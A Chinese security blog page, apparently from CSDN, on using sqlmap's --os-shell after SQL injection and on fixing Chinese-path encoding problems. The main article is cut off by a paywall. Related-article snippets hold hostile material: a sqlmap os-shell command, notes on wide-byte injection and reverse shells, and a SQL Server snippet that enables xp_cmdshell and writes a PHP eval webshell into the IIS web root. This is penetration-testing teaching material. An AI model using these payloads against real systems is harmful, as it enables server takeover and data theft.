从sql注入到getshell (内附sqlmap的os-shell遇到中文路径的解决办法)

最新推荐文章于 2025-03-21 21:43:33 发布
原创 最新推荐文章于 2025-03-21 21:43:33 发布 · 4k 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql #web安全 #网络安全 #渗透测试

本文介绍了通过SQL注入获取操作系统shell的过程中遇到的中文路径问题。使用sqlmap进行渗透测试时,发现命令执行受限于系统路径。通过分析编码问题,发现目标服务器采用GBK编码而非UTF-8。利用Burp Suite设置代理,修改请求包并用Python脚本进行GBK编码转换,成功解决了命令执行的问题,实现了列出E盘文件。强调所有渗透测试需获取授权,分享内容仅供技术讨论。

`搜索公众号:白帽子左一,每天更新技术干货!

作者:掌控安全学员——君叹

基本界面

试试看信息列表里面随便点一条看下网络请求

图片

可以看到一个带有参数的请求,我们试着直接访问

图片

直接访问的话能够看到直接的文章内容

图片

尝试一下更改bti的值

图片

试试直接用sqlmap跑

测试成功,存在sql注入

图片

尝试参数 —os-shell

看看是否能拿到shell

图片

成功getshell

但是我们执行命令默认都在’C:\Windows\system32’这个路径下

最低0.47元/天 解锁文章
对某网站的渗透(SQL注入+上传Getshell
江左盟的博客
04-22 1万+
信息收集 访问网站发现网站不存在robots.txt文件,扫描网站根目录未发现有价值的信息,点击网站按钮查看功能的时候发现有个路径是xxcms/…,然后访问xxcms发现网站跳转到后台,如图: 尝试弱口令和暴力枚举未发现正确口令,然后扫描xxcms目录发现一个未授权上传文件的页面,如图: 但是之能上传图片和office文档,尝试绕过失败,在主页和“投诉建议”功能处存在搜索框,但不存在SQL注入,如图: 点击“我要投诉/建议”发现可以写数据并提交,如图: 点击按钮之后其中一个数据包如图: 漏洞发现
sqlmap --os-shell选项原理解析
来日可期的博客
10-18 2738
sqlmap--os-shell在mysql数据库中的原理,是往服务器上写入了两个php,其中一个提供了文件上传的页面,可以通过这个上传页面上传脚本文件到当前目录下。另外一个则是返回了可以让我们执行系统命令的命令行,命令行也可以在网页url中通过对cmd参数传参执行系统命令。
sqlmap os shell中文路径问题
kuuhh的博客
08-19 1467
问题 看了师傅文章MSSQL高权限注入写马至中文路径自己复现一下。 复现 环境: win10 phpstudy sqli-labs靶场 python sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 --os-shell --proxy http://127.0.0.1:8080 正常写带中文路径的,可以看到是失败的没有生成文件。 burp抓个包。 将命令GB2312编码,然后替换到burp上。 echo ^<?php @
SQL注入:为什么拿不到os-shell
无名J0kзr的博客
10-08 2031
文章目录权限问题--file-read--file-write和--file-dest--os-shell 权限问题 首先确保注入点的数据库连接用户有FILE权限 使用 --privileges查看 但是 就算有此权限也还有很多问题 SELINUX 因为我的服务器使用的并不是Apache的默认发布目录 所以我把SELINUX禁掉了 按理来说 SELINUX也会对这些操作有影响 没试 先留坑 –fi...
SQL注入步骤和常用函数以及中文处理方法
11-08 2646
第一节、SQL注入的一般步骤  首先,判断环境,寻找注入点,判断数据库类型,这在入门篇已经讲过了。    其次,根据注入参数类型,在脑海中重构SQL语句的原貌,按参数类型主要分为下面三种:    (A) ID=49 这类注入的参数是数字型,SQL语句原貌大致如下:  Select * from 表名 where 字段=49  注入的参数为ID=49 And [查询条件],即是生成语句:  Sele
SQLmapsql注入(二)
qq_58000413的博客
08-14 533
可以使用 -v 参数,0-6显示的数据一次详细,如果想看到sqlmap发送的测试payload最好使用的等级就是3。python sqlmap.py -l 文件名 --batch --smart。注意:log文件中如果有sqlmap无法读取的字符(ascii码之外的字符)会读取失败。一、执行--os-shell的系统操作的要求。3、GPC为off,php主动转义的功能关闭。2.把记录的log文件放sqlmap目录下。产生交互式的操作系统的shell,用来执行cmd命令。1.判断可注入的参数。...
sqlmap —— os-shell参数分析
未完成的歌~的博客
10-07 5004
文章目录前言:一、os-shell执行原理二、测试环境:三、过程演示1、测试权限2、攻击3、选择语言4、输入绝对路径5、建立 os-shell 并执行命令四、原理分析总结: 前言: 最近在看sqlmap,发现--os-shell这个命令很厉害,所以来研究一下。 一、os-shell执行原理 对于 Mysql 数据库来说,--os-shell的本质就是写入两个 php 文件,其中的一个可以让我们用来执行命令,而另外一个可以让我们可以上传文件。 说到写入文件,就要说一下上传文件的两个前提条件,首先我们要知道网站
SQL注入(宽字节注入sql注入getshellsqlmap注入的使用)和XSS漏洞(存储型)实战练习(DVWA靶场)
m0_74292210的博客
03-21 761
因为网站会把用户输入的'前面加\进行处理,\会被编码为%5c,但是在查询中把%df和%5c通过GBK编码为汉字。在我们的请求里面,网站已经把我们输入的%编码为了%25,不能达到我们的目的,所以手动修改数据包。发现name做了长度限制,可以通过抓包或者改前端html来绕过。然后发现name做了<script>的替换,然后可以开始绕过。发现方法有效,该点存在宽字节注入漏洞,然后开始正式爆破。所以在'前加一个%df就可以把网站给我们加的\给绕过。过滤,绕不过去,只能从name注入。数据库名为pikachu。
sqlmap os-shell原理
信安路上……
12-04 2825
sqlmap os-shell原理 0x01 流程 i. 简单判断 从截图显示中,可以看到有以下几步 1、选择 web 应用语言 2、发现(提供)一个可写的绝对路径 3、顺序(不同方法)上传tmpujout.php、tmpbvwsp.php两个文件 ii. 流量分析 主要的http流量有 4 条,第 2 条根据@@version_compile_os首字母判断操作系统,第 4 ...
sqlmap --os-shell 使用方法
m0_50818626的博客
06-07 5118
可以看到最下方有文件上传的位置,在这里我们可以上传一句话木马。如上图所示,红框处很明显是一个传参点,我们就在这个页面抓包。总结:sqlmap -os-shell 的使用需要以下条件。抓到包之后将内容保存到桌面的1000.txt文件下。--os-shell:本质就是写入两个php文件。-dbms=mysql:指定跑mysql数据库。我们获得了两个url,我们访问第一个url。这里我们先选择4,因为网站是php代码写的。三、上传一句话木马,连接蚁剑。上图就是一句话木马的内容。二、sqlmap跑包。
6-Shell参数传递
du98看灯夜的博客
04-17 295
#!/bin/bash #Shell 传递参数使用 # $file 为执行的文件名(包含文件路径): ./6-test.sh 0 1 hao # 给文件5输入三个键入参数 :<<! 参数处理 说明 $# 传递到脚本的参数个数 $* 以一个单字符串显示所有向脚本传递的参数。如"$*"用「"」括起来的情况、以"$1 $2 … $n"的形式输出所有参数。 $$ 脚本运行的当前进程ID号 $! 后台运行的最后一个进程的ID号 $@ 与$*相同,但是使用时加引号,并在引号中返回每个参数。.
一文了解--os-shell原理及条件
allintao的博客
03-21 1583
本文主要介绍关于sqlmap--os-shell拿到shell的原理及条件。
sqlmapshell
goddemon
06-20 4599
sqlmap5种思路拿shell总结 ①利用dump 管理员类的账户后进入进行站点后拿shell 或者拿到账户后远程连接进行连接进行udf类提取类拿shell #连接方法 sqlmap -d “mysql://admin:password@192.168.1.1:3306/security” admin是账号,psw是密码,后面是地址和端口,security数据库。我们数据库可以用current-db来查看 ②利用os-shellshell 条件①知绝对路径 ②管理员权限 ③开启 ③
SQL——shell命令
qq_36912885的博客
09-02 2055
8.0之后的sql毛病是真鸡多,把这些常用的命令的都记录下来。里面包含了从安装到使用,远程登录,密码,redis,等等乱七八糟的问题。
sqlmap 如何 --os-shell 及反弹shell
weixin_63580357的博客
10-17 1861
从上面结果可以看出已经成功反弹 shell,不过这个 shell 操作起来不甚顺畅,可以在 Kali 生成反弹 shell 代码,借助上面生成的一个文件上传界面。就会通过上面这个php上传一个用于命令执行的tmpbylqf.php到网站路径下,让我们命令执行,并将输出的内容返回sqlmap端。来说,--os-shell的本质就是写入两个php文件,其中的tmpugvzq.php可以让我们上传文件到网站路径下。-o shell.php:指定生成的payload文件的名称为shell.php。
渗透测试|sql注入Getshell的几种方式
jennycisp的博客
11-03 2677
介绍几种利用sql注入获取系统权限的方法,一是利用outfile函数,另外一种是利用–os-shell
Oracle的getshell命令执行的实战(有版本限制)
weixin_50464560的博客
02-05 7832
文章中涉及到的漏洞均已提交,渗透测试需规范!这是个人认为近期比较有价值的一次渗透测试,分享给大家。主要分为4个步骤:弱口令进入系统;后台sql注入getshell,远程RDP管理员登录;扩大战果,证明危害。0x01 弱口令在一次针对某站点信息收集的过程中,通过子域名扫描,扫描到某个老旧系统。一看这都2014年的老站了,肯定有搞头!日常使用burp爆破一波试试,没爆破出来但是随手一试,好家伙123/123进入系统,属于是运气拉满了(高强度打码)这里能看到是一个“编辑”人员的权限,并没有什么上传等后台管理的功
sqlmap技巧系列-dump数据出现乱码
u011466862的专栏
03-08 5954
1. 场景 我们发现了一个SQL注入点,在通过sqlmap dump数据的时候出现乱码了,如果我们希望通过sqlmap选项,以合理的方式处理这些乱码的数据,就需要一些技巧性的使用方式了。 1.1 注入点 可以看到下图中,在我VPS上的sqlmap--sql-shell选项下,通过sql语句来获取某个字段的内容时,sqlmap输出的数据是乱码的 2. 技巧 关于dump数据输出乱码,我们至少可以用二种以上的技巧来解决 --binary-fields:将指定的字段以十六进制的格式输出(☆☆☆☆☆五星推荐
SQL注入GetShell方法(1)
forinput的博客
05-06 5450
SQL注入getshell的五中方式
sqlserver利用sqlmap--getshell需要那些条件?
最新发布
07-19
SQL Server 中使用 `sqlmap` 的 `--getshell` 功能进行渗透测试,需要满足一系列条件。`--getshell` 功能通常用于在目标数据库支持文件写入的情况下,通过 SQL 注入漏洞上传 Web Shell 或执行命令,从而获取对目标系统的控制权。 以下是使用 `--getshell` 所需的条件: 1. **SQL 注入漏洞存在** 目标系统必须存在可利用的 SQL 注入漏洞,并且攻击者能够通过 `sqlmap` 检测到该漏洞。注入点必须允许执行多语句查询或堆叠查询(Stacked Queries)[^3]。 2. **数据库用户权限足够** 当前数据库用户必须具有足够的权限来执行文件写入操作或调用系统命令。在 SQL Server 中,通常需要 `sysadmin` 权限才能启用 `xp_cmdshell` 或写入 Web 可访问目录[^3]。 3. **允许文件写入** SQL Server 必须允许将内容写入文件系统,通常通过 `xp_cmdshell` 或 `bcp` 命令实现。如果目标服务器启用了 `xp_cmdshell`,攻击者可以利用它执行命令并上传 Web Shell[^3]。 4. **Web 可访问路径已知** 攻击者必须知道 Web 服务器上可访问的路径,以便上传 Web Shell 并通过浏览器访问。例如,`C:\inetpub\wwwroot` 是常见的 IIS Web 根目录路径。 5. **防火墙或 WAF 未拦截** 目标服务器的防火墙或 Web 应用防火墙(WAF)不应拦截 `sqlmap` 的请求或 Web Shell 的上传行为。`sqlmap` 提供了多种绕过机制(如 `--tamper` 脚本)来规避检测[^1]。 6. **支持堆叠查询或多语句执行** SQL Server 必须支持堆叠查询或多个语句连续执行,这样 `sqlmap` 才能依次执行创建文件、写入 Shell、执行命令等操作。 7. **启用 `xp_cmdshell` 或类似功能** 默认情况下,SQL Server 禁用了 `xp_cmdshell`。如果未启用,攻击者可能需要先通过注入点启用该功能,这通常需要 `sysadmin` 权限[^3]。 ### 示例:启用 `xp_cmdshell` 并上传 Web Shell ```sql -- 启用 xp_cmdshell EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; -- 使用 xp_cmdshell 写入 Web Shell EXEC xp_cmdshell 'echo <?php @eval($_POST["cmd"]);?> > C:\inetpub\wwwroot\shell.php'; ``` ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值